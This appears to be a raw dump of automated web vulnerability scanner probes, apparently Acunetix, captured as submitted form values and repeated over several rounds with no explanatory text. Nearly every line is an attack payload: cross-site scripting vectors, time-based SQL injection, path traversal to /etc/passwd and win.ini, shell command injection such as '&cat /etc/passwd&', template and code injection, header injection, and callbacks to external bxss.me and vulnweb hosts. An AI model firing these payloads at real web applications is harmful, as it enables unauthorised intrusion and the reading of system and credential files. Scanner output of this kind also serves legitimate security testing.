1<video><source onerror="javascript:prompt(982641)">

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944499)"></g></svg>

1

1

1

1

1<div style=width:expression(prompt(971703))>

1

response.write(9603079*9861020)

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9603079*9861020)+'

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<body onload=prompt(941592)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"+response.write(9603079*9861020)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960556)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(941074)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(933673)>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(991642)</sCripT>

1

`cat /etc/passwd`

${100102+100060}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

|cat /etc/passwd#

1

1

1&n930510=v933359

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(993432) //\xf6>

)

-1)

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

!(()&&!|*|*|

1<input autofocus onfocus=prompt(951730)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

testasp.vulnweb.com

"|"ld

1

Vf29dwPM'

/etc/passwd

1

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

7MfdmLai')

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

9wMyUUMG'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1_k7Upl <ScRiPt >prompt(916065)</ScRiPt>

1

1

${@print(md5(acunetix_wvs_security_test))}

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

http://hityPbNoFOiGj.bxss.me/

acunetix_wvs_invalid_filename

-1)

1

1

1

1

1

comments

&dir

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

1

comments

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

8QO5nlsQ'

1

1

'&dir&'

1'"()&%<ScRiPt >prompt(995655)</ScRiPt>

comments/.

'"

WEB-INF/web.xml

1

1

1

BdCZfKCR')

"&dir&"

'"()&%<ScRiPt >prompt(977218)</ScRiPt>

1

<!--

1

WEB-INF\web.xml

1_933486

|dir

JkbMlASv'))

1

../../../../../../../../../../windows/win.ini

1

1

1

1

'|dir

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu8468\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8468

1

1

acux9427\xc0\xbez1\xc0\xbcz2a\x90bcxuca9427

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(940714)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(971470)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(983116)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979241></ScRiPt>

1

1

1<ScRiPt >prompt(974692)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(947370)">

1

1

response.write(9694816*9725907)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986848)"></g></svg>

'+response.write(9694816*9725907)+'

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(904774))>

WEB-INF/web.xml

"+response.write(9694816*9725907)+"

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(968876)>

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918013)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${100071+99377}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(945718)>

`cat /etc/passwd`

1

1

1

1&n952545=v969345

1

1some_inexistent_file_with_long_name%00.jpg

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(938608)>

|cat /etc/passwd#

1

1

1

1

1<ScRiPt%20>prompt(903925)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

1

'|'ld

1

1

testasp.vulnweb.com

/etc/passwd

-1))

1&lt

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(961040) //\xf6>

szZkijUr'

1

1

1

1

'

1

'

7otvTlwq')

1<input autofocus onfocus=prompt(928104)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

1

1

"

nRIxOHLK'))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitwo9DJQhEWC.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

1

||cat /etc/passwd

-1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

1

-1)

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

1_YiCuv <ScRiPt >prompt(978256)</ScRiPt>

'"

file:///etc/passwd

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

comments

'&dir&'

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

mn0Pm0t9'

comments/.

1

1

"&dir&"

WEB-INF/web.xml

1

1

XaVKuopK')

1

|dir

1

1'"()&%<ScRiPt >prompt(958693)</ScRiPt>

1

1

1

TlcCgFFO'))

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(911877)</ScRiPt>

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1_936457

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu6278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6278

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux9368\xc0\xbez1\xc0\xbcz2a\x90bcxuca9368

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(939823)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(956896)</script>

1

1

1

1<ScRiPt >prompt(978209)</ScRiPt>

1

WEB-INF/web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969297></ScRiPt>

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(934504)</ScRiPt>

1

1

1

1

1

1<video><source onerror="javascript:prompt(964027)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959614)"></g></svg>

1

1

1<div style=width:expression(prompt(991765))>

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(955880)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996703)>

1

1

1<img src=xyz OnErRor=prompt(977317)>

1

1<img/src=">" onerror=alert(958024)>

1

1<ScRiPt%20>prompt(902426)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(926107) //\xf6>

1

1<input autofocus onfocus=prompt(915450)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_iWmjb <ScRiPt >prompt(980866)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9962711*9303588)

'+response.write(9962711*9303588)+'

1

"+response.write(9962711*9303588)+"

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

cat /etc/passwd

${100242+99377}

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n925706=v963289

)

-1)

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

^(#$!@#$)(()))******

'"()

HTyxJ02y'

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

TvBkvN1U')

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

"

JFaaV5KM'))

1

${@print(md5(acunetix_wvs_security_test))}

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitG8gHcdgB6A.bxss.me/

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

http://www.acunetix.tst

'"

dqYtL1xz'

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1'"()&%<ScRiPt >prompt(909646)</ScRiPt>

comments/.

<!--

1

&dir

1

bOl9xWgA')

'"()&%<ScRiPt >prompt(914409)</ScRiPt>

1

1

'&dir&'

5ziikOfk'))

1_916797

1

1

file:///etc/passwd

"&dir&"

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

'|dir

1

WEB-INF\web.xml

1

"|dir

acu3103\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3103

../../../../../../../../../../windows/win.ini

1

acux2051\xc0\xbez1\xc0\xbcz2a\x90bcxuca2051

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(996414)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(982162)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(972680)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982876></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(922425)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9186897*9972074)

1<video><source onerror="javascript:prompt(929381)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913650)"></g></svg>

'+response.write(9186897*9972074)+'

1

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(952152))>

1

"+response.write(9186897*9972074)+"

'&cat /etc/passwd&'

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(935689)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933416)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

${99551+100447}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<img src=xyz OnErRor=prompt(949178)>

-1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n918666=v950338

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(960698)>

)

1

'|'ld

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1<ScRiPt%20>prompt(901254)</sCripT>

testasp.vulnweb.com

"|"ld

1

!(()&&!|*|*|

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

ZDfwnK2A'

1

1

'"()

^(#$!@#$)(()))******

/etc/passwd

'

GGvXXm9Y')

'

1

\xf6<img acu onmouseover=prompt(931059) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

jTt8GNA1'))

"

1<input autofocus onfocus=prompt(902688)>

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

http://hit5p9Svy9VRd.bxss.me/

1

1

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1)

&dir

1

acunetix_wvs_invalid_filename

1

1

1_8z5M0 <ScRiPt >prompt(986889)</ScRiPt>

1

1

comments

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

1

1

1

comments

U8wO2VW2'

1

"&dir&"

'"

WEB-INF/web.xml

1

comments/.

1

1

1

|dir

<!--

1'"()&%<ScRiPt >prompt(948535)</ScRiPt>

DOXRndQA')

WEB-INF\web.xml

'|dir

1

1

1

1

1

8fMvopnC'))

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(953992)</ScRiPt>

"|dir

1

1

1

1

1

1

1_917950

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu5494\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5494

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux3617\xc0\xbez1\xc0\xbcz2a\x90bcxuca3617

1

1

................windowswin.ini

1

1<ScRiPt >prompt(999281)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(934303)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(934682)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942813></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(954742)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(967926)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949998)"></g></svg>

1

1<div style=width:expression(prompt(973925))>

1

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

response.write(9516007*9697339)

WEB-INF\web.xml

1

1<body onload=prompt(913395)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945202)>

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9516007*9697339)+'

1

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(974871)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9516007*9697339)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(946046)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(955760)</sCripT>

1

1

1

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1&lt

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

-1

1

${99894+100250}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n955038=v945329

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(977211) //\xf6>

1

)

1some_inexistent_file_with_long_name%00.jpg

1

1

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(941127)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

'"()

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

'

SoAPoyrJ'

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

HdcMS5V8')

"

'

1

http://hittqAOYP40Ti.bxss.me/

1_KFsAT <ScRiPt >prompt(962471)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

C76JwHzu'))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

&dir

1

-1)

http://www.acunetix.tst

1

1

'&dir&'

1

comments

1

file:///etc/passwd

1

"&dir&"

'"

-1))

1

1'"()&%<ScRiPt >prompt(915516)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

'"()&%<ScRiPt >prompt(902943)</ScRiPt>

VAQylRIL'

<!--

|dir

1_933169

WEB-INF/web.xml

1

1

1

1

aPY86iwm')

'|dir

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

bgZpLfTv'))

1

1

1

acu9164\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9164

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux2366\xc0\xbez1\xc0\xbcz2a\x90bcxuca2366

1

1

1

1<ScRiPt >prompt(939236)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(979401)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(977247)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912614></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(938092)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(968515)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944354)"></g></svg>

1

1

1<div style=width:expression(prompt(965589))>

1

response.write(9718154*9137079)

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

'+response.write(9718154*9137079)+'

1

1

&cat /etc/passwd&

1

"+response.write(9718154*9137079)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(991155)>

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967067)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img src=xyz OnErRor=prompt(916156)>

${99612+99054}

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(911868)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

cat /etc/passwd

1

1<ScRiPt%20>prompt(943418)</sCripT>

1

1&n952655=v901171

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

)

1&lt

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

-1

1

1

\xf6<img acu onmouseover=prompt(943135) //\xf6>

!(()&&!|*|*|

|cat /etc/passwd#

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1<input autofocus onfocus=prompt(906838)>

-1))

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

testasp.vulnweb.com

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"|"ld

1

MoSZQHIe'

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

5HUkUvpm')

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_SUbTg <ScRiPt >prompt(913919)</ScRiPt>

1

1

'

1

http://hitY1HhKsIr5k.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

4T38gPns'))

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

comments

1

1

1

||cat /etc/passwd

comments

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

-1))

1

'"

1

file:///etc/passwd

1

&dir

1

1

1

MXdjhzh3'

1

<!--

1'"()&%<ScRiPt >prompt(911451)</ScRiPt>

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

iuSaVebg')

1

'"()&%<ScRiPt >prompt(953710)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1_949611

8DPSduEm'))

1

'|dir

WEB-INF\web.xml

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu3527\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3527

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux3492\xc0\xbez1\xc0\xbcz2a\x90bcxuca3492

1

1

1<ScRiPt >prompt(926357)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(958617)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(940621)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

